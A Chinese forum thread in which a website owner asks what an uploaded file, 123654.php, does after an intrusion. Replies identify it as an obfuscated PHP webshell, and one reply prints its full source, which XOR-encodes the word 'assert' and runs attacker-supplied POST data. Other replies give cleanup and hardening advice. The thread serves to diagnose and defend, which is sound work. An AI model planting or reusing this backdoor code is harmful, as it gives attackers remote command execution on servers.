网站被入侵求解这代码的作用是什么，谢谢！

laotielove

网站被入侵，目录里面多一个123654.php的文件
文件内容如图

有人说这是加密了的，看不出来什么内容

我想问。这种代码一般获取网站数据库信息呢？还是获取管理员信息。
好像管理员信息就在数据库里面!!

mmji

这是个一句话后门，不仅可以读取数据库信息，还能对网站文件进行修改操作，权限设置不严格还能执行任意命令
如果服务器有提权漏洞，还能提权服务器，接管你的服务器权限
如果要防护的话还要翻查日志，查找被入侵的记录，看看是哪里存在漏洞被入侵，修复漏洞，删除木马文件，如果自己处理不来的话可以私信我帮忙

solly

为啥发图片，别人用肉眼来执行代码呀？
这个是 assert 一句话木马，id是编码标志，id有值是base64编码，没有值明文，config就是要执行的命令内容：

[PHP] 纯文本查看 复制代码

<?php
class FNYW(){
  function zRkh() {
    $BiJO = "\x2d"^"\x4c";
    $QXpU = "\x67"^"\x14";
    $WuBD = "\xc0"^"\xb3";
    $irHJ = "\xdb"^"\xbe";
    $yiPf = "\xa7"^"\xd5";
    $VPfZ = "\xb0"^"\xc4";
    $SJkl =$BiJO.$QXpU.$WuBD.$irHJ.$yiPf.$VPfZ;
    return $SJkl; /// "assert"
  }
  function __destruct() {
    $ztYM=$this->zRkh();
    @$ztYM($this->RI);
  }
}
$fnyw = new FNYW();
@$fnyw->RI = isset($_GET['id'])?base64_decode($_POST['config']):$_POST['config'];
?>

laotielove

怎么都没有人回复呢？大佬们，这种问题怎么防护？

vscos

你得找到网站的漏洞是什么才行，

叶枫

一句话后门

pojie202

base64加密   进制转换。这个属于WEBSHELL变形，一定是网站哪里有漏洞，还是用安全工具再扫下。

Asra

这个是一句话木马，整个php是个后门文件，对方可以通过后门直接操作你的系统，执行命令，具体有没有读取数据库还是做了其他操作，得去看日志文件了。这里面是不会写的，它只是个后门

laotielove

mmji 发表于 2023-12-31 21:27
这是个一句话后门，不仅可以读取数据库信息，还能对网站文件进行修改操作，权限设置不严格还能执行任意命令 ...

我已经重装系统，他把文件放到upload文件夹下，是不是上传文件源码有漏洞，没有检测文件类型。
查不到记录了，我都重装了。
估计重装也解决不了问题，因为漏洞在哪里没有查。
我目前是把服务器整个文件目录设置了只读，不给写权限。

laotielove

1、php.ini我关闭了文件上传功能。这样有点用吗？
2、文件目录我设置了555权限。

lpxx

加密后的一句话后门，要么源码，要么服务器有问题，删了没用的。